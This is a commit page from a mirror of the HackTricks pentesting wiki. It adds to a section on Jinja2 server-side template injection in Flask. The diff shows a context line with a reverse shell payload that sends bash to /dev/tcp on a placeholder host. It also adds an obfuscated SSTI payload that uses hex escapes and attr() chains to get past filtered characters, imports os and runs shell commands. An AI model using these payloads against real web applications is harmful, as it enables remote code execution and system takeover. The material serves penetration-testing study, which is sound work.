mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GITBOOK-3792: No subject
This commit is contained in:
parent
c1cccba14b
commit
da094e016f
1 changed files with 10 additions and 0 deletions
|
@ -239,6 +239,16 @@ By default Flask HTML encode all the inside a template for security reasons:
|
|||
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
|
||||
```
|
||||
|
||||
## Without several chars
|
||||
|
||||
Without **`{{` `.` `[` `]` `}}` `_`**
|
||||
|
||||
```python
|
||||
{% raw %}
|
||||
{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}
|
||||
{% endraw %}
|
||||
```
|
||||
|
||||
## Jinja Injection without **\<class 'object'>**
|
||||
|
||||
From the [**global objects**](jinja2-ssti.md#accessing-global-objects) there is another way to get to **RCE without using that class.**\
|
||||
|
|
Loading…
Reference in a new issue